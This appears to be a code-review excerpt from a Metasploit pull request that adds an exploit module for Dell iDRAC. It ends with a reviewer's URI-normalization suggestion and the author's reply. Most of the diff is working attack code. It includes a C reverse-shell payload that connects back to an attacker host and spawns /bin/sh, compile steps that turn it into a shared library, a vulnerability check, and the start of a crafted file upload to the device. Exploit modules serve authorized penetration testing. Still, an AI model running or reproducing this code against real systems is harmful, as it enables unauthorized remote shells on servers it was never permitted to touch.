modules/exploits/linux/http/dell_idrac_upload_exec.rb

```diff
@@ -0,0 +1,188 @@
+      static void main(void)
+      {
+        int pid = fork();
+        if(!pid) {
+          int sock = socket(AF_INET, SOCK_STREAM, 0);
+          struct sockaddr_in serv_addr = {0};
+          serv_addr.sin_family = AF_INET;
+          serv_addr.sin_port = htons(#{lport});
+          serv_addr.sin_addr.s_addr = inet_addr("#{lhost}");
+          connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
+          dup2(sock, 0);
+          dup2(sock, 1);
+          dup2(sock, 2);
+          execl("/bin/sh", "/bin/sh", NULL);
+        }
+      }
+    EOF
+    file.puts data
+  end
+
+  def compile(source_path, payload_path, gcc_args = '')
+    gcc_cmd = "sh4-linux-gnu-gcc-8 -shared -fPIC #{source_path} -o #{payload_path}"
+
+    unless gcc_args.to_s.blank?
+      gcc_cmd << " #{gcc_args}"
+    end
+
+    if `dpkg --get-selections | grep ^gcc-8-sh4-linux-gnu`.blank?
+      fail_with Failure::BadConfig, 'gcc-8-sh4-linux-gnu is not installed. Unable to compile.'
+    end
+
+    output = `#{gcc_cmd}`
+
+    if output.blank?
+      vprint_status "Compiled #{payload_path}"
+    else
+      vprint_status output
+    end
+
+  end
+
+  def check
+    uri = '/cgi-bin/login'
+    print_status("Sending request to https://#{rhost}#{uri}")
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => uri,
+        'vars_get' => {
+          'LD_DEBUG' => 'files'
+        }
+      },
+      datastore['TIMEOUT']
+    )
+
+    if res && res.body.to_s =~ /calling init:/
+      print_status('Valid response received...')
+      return CheckCode::Vulnerable
+    elsif res && res.code != 200
+      return CheckCode::Safe
+    elsif res
+      print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
+    else
+      print_error('No reply received from the target')
+    end
+    return CheckCode::Unknown
+  end
+
+  def exploit
+    unless check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    # Write payload to temp file
+    temp_file = Rex::Quickfile.new(['', '.c'])
+    write_payload(temp_file, datastore['LHOST'], datastore['LPORT'])
+    temp_file.close
+
+    # Compile payload to temp library
+    payload_file = Rex::Quickfile.new(['', '.so'])
+    compile(temp_file.path, payload_file.path)
+
+    payload_so = File.read payload_file.path
+
+    f_alias = 'RACPKSSHAUTHKEY1'
+    payload = f_alias + ['00' * (32 - f_alias.size)].pack('h*')
+    payload += [payload_so.size].pack('V*')
+    vprint_status "Length of payload is #{payload_so.size}"
+    payload += ['1'].pack('h8')
+    payload += payload_so
+
+    # Upload payload
+    uri = '/cgi-bin/putfile'
+    print_status("Sending request for https://#{rhost}#{uri}")
+    res = send_request_raw(
+      {
+        'method' => 'POST',
+        'uri' => uri,
```

Comment:
Assuming `TARGETURI` is defined:

```suggestion
        'uri' => normalize_uri(target_uri.path, uri),
```

Reply:
Covered with 78b7848